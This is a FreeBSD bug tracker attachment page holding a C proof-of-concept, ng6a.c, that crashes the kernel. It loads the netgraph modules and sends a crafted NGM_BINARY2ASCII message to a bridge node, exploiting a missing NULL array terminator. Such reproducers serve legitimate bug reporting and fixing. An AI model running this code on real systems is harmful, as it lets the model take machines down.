Attachment 237745 Details for Bug 267457 – provoke crash in netgraph due to missing { NULL } array terminator

provoke crash in netgraph due to missing { NULL } array terminator

ng6a.c (text/plain), 1.45 KB, created by Robert Morris on 2022-10-31 08:06:00 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Robert Morris

Created: 2022-10-31 08:06:00 UTC

Size: 1.45 KB

patch

obsolete

>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <sys/ioctl.h>
>#include <netinet/in.h>
>#include <sys/wait.h>
>#include <sys/resource.h>
>#include <arpa/inet.h>
>#include <assert.h>
>#include <ctype.h>
>#include <fcntl.h>
>#include <signal.h>
>#include <netgraph/ng_message.h>
>#include <netgraph/ng_socket.h>
>#include <netgraph.h>
>
>unsigned long long aa[] = {
>0x80ull,
>0xffffffc000000000ull,
>0x1fffffff6ull,
>0xa2760bf600000000ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>};
>int aai;
>
>int
>main(){
>  signal(SIGPIPE, SIG_IGN);
>
>  system("kldload netgraph");
>  system("kldload ng_socket");
>  system("kldload ng_bridge");
>
>  int cs = -1;
>  int ds = -1;
>  NgMkSockNode(NULL, &cs, &ds);
>
>  struct ngm_mkpeer mkp;
>  memset(&mkp, 0, sizeof(mkp));
>  strcpy(mkp.type, "bridge");
>  strcpy(mkp.ourhook, "hook");
>  strcpy(mkp.peerhook, "link0");
>
>  if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
>                NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
>    fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
>  }
>
>  char *path = ".:hook";
>  int cookie = NGM_GENERIC_COOKIE;
>  int cmd = NGM_BINARY2ASCII;
>  char arg[128];
>  unsigned int len = aa[aai++];
>  if(len > sizeof(arg)) len = sizeof(arg);
>  memset(arg, 0xff, sizeof(arg));
>  for(int i = 0; i+8 <= sizeof(arg); i += 8)
>    *(long long *)(arg + i) ^= aa[aai++];
>  NgSendMsg(cs, path, cookie, cmd, arg, len);
>}

Actions: View

Attachments on bug 267457: 237745